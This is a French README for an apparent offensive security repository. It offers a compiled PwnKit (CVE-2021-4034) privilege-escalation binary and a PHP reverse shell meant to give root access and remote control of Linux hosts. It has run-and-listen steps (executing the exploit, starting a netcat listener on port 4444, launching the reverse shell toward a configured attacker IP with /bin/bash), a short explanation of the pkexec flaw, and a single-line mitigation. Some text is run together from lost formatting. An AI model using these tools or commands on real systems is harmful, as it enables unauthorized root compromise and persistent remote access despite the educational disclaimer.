
Dépôt de recherche en sécurité contenant une Preuve de Concept (PoC) pour la vulnérabilité CVE-2021-4034 (PwnKit) et des utilitaires de script pour la démonstration d'escalade de privilèges et d'exécution à distance dans des environnements Linux.
⚠️ AVERTISSEMENT : Ce dépôt a été créé uniquement à des fins éducatives et de recherche en sécurité. L'auteur n'est pas responsable de l'utilisation abusive de ces outils. Utilisez-le uniquement dans des environnements contrôlés ou là où vous avez une autorisation explicite.
Ce dépôt contient une Preuve de Concept (PoC) compilée pour la vulnérabilité PwnKit (CVE-2021-4034), un défaut critique d'escalade de privilèges local dans le composant pkexec de Polkit.
De plus, un script de Reverse Shell en PHP est inclus, prêt à être déployé après l'exploitation ou comme vecteur d'accès initial.
Obtenir un accès root sur des systèmes Linux vulnérables et établir une persistance ou un contrôle à distance via un shell inverse.
PwnKit (Binaire ELF)L'exploit compilé pour CVE-2021-4034.
pkexec pour charger une bibliothèque partagée malveillante et exécuter du code en tant que root.pkexec soit installé sur la cible.reverseShell.phpUn payload léger pour établir une connexion inverse.
192.168.1.84444/bin/bashphp reverseShell.php) ou injecté dans un serveur web vulnérable.PwnKit vers le système victime.chmod +x PwnKit
./PwnKit
En cas de succès, vous devriez obtenir immédiatement un shell avec les privilèges root.nc -lvnp 4444
reverseShell.php si votre IP est différente de celle configurée par défaut.php reverseShell.php
Cette vulnérabilité réside dans la façon dont pkexec gère les arguments de la ligne de commande. En passant une liste d'arguments vide, pkexec tente d'accéder à argv[1] hors limites, ce qui permet à un attaquant de réécrire des variables d'environnement en mémoire, en injectant spécifiquement une variable GCONV_PATH malveillante pour détourner le flux d'exécution.
Pour se protéger contre cet exploit :
chmod 0755 /usr/bin/pkexec
Happy Hacking ! 🏴☠️